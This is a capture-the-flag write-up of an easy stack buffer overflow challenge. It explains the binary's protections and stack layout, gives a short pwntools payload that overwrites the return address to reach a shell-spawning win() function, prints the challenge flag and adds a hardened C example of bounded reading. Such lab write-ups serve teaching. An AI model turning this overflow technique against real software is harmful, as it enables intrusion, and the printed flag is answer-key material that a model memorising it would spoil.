Buffer Overflow Intro
Recuite 2025 - HCMUS
October 6, 2025
Binary Exploitation · Easy · 100 points
Tags: Buffer Overflow, RIP Control, Stack

Buffer Overflow Intro - Write-up

Challenge Information

  • Category: Binary Exploitation
  • Difficulty: Intro/Easy
  • Protection: PIE, NX, IBT/SHSTK enabled; No Stack Canary

Analysis

Binary Behavior

  1. Prints the address of the win function (PIE is enabled, so it changes every run)
  2. Prints the stack layout
  3. Reads up to 256 bytes of input into a 16-byte buffer → Buffer Overflow!

Stack Layout

Offset  | Content
--------|------------------
0x00    | Buffer (16 bytes)
0x10    | Saved RBP (8 bytes)
0x18    | Return Address (8 bytes)
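The defect the write-up describes is a read length (256) that exceeds the destination buffer (16 bytes), so surplus input runs into the saved RBP at +0x10 and the return address at +0x18. As an added illustration, not code from the challenge or this write-up, the hardened read below derives its length from the buffer size instead; the pipe demo and the names `bounded_read` and `demo_oversized_input` are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 16      /* the challenge's 16-byte stack buffer */
#define REQUESTED 256    /* the length the challenge asks read() for */

/* Bug pattern described in the write-up (shown as a comment, not compiled):
 *   char buf[16];
 *   read(0, buf, 256);   // 240 bytes land past buf: saved RBP, return address
 */

/* Hardened replacement: the read length comes from the destination size,
 * so input can never reach the saved RBP or the return address.
 * Returns the number of bytes stored; buf is always NUL-terminated. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) { buf[0] = '\0'; return -1; }
    buf[n] = '\0';
    return n;
}

/* Demo: push REQUESTED bytes of constructed input through a pipe and
 * count how many the bounded read stores. Returns that count or -1. */
ssize_t demo_oversized_input(void) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char junk[REQUESTED];
    memset(junk, 'A', sizeof junk);
    ssize_t w = write(fds[1], junk, sizeof junk); /* 256 bytes fit in a pipe */
    close(fds[1]);
    if (w != (ssize_t)sizeof junk) { close(fds[0]); return -1; }
    char buf[BUF_SIZE];
    ssize_t stored = bounded_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    if (stored < 0) return -1;
    return (ssize_t)strlen(buf); /* 15: cap - 1 bytes, then the terminator */
}

int main(void) {
    printf("stored %zd of %d offered bytes\n", demo_oversized_input(), REQUESTED);
    return 0;
}
```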

Win Function

Located at offset 0x1209 in the PIE binary; it executes /bin/sh via execve:

void win() {
    char *args[] = {"/bin/sh", NULL};
    execve(args[0], args, NULL);
}

Exploitation

Payload Structure

from pwn import p64          # pwntools helper: 64-bit little-endian packing

payload = b"A" * 24          # Fill the 16-byte buffer + 8-byte saved RBP
payload += p64(win_addr)     # Return address → win (win_addr parsed from the leak)

Exploitation Steps

  1. Parse win function address from output
  2. Construct payload: 16 bytes buffer + 8 bytes RBP + 8 bytes win_addr
  3. Send payload
  4. When function returns, jumps to win() → shell!
  5. Send command cat flag.txt

Key Notes

  • IBT enabled → can only return to functions that begin with an endbr64 instruction
  • No RET gadget needed for stack alignment (win handles it)
  • A shell is spawned after exploitation; commands must then be sent to it

Flag

BPCTF{noi_tinh_yeu_bat_dau_4130218ceb6f154233bfd7c7fab262d7}

Key Takeaways

  • Basic buffer overflow: overwrite the return address
  • PIE does not prevent exploitation if an address is leaked
  • IBT limits jump targets to valid function entries
  • Stack canaries are only effective if they are not leaked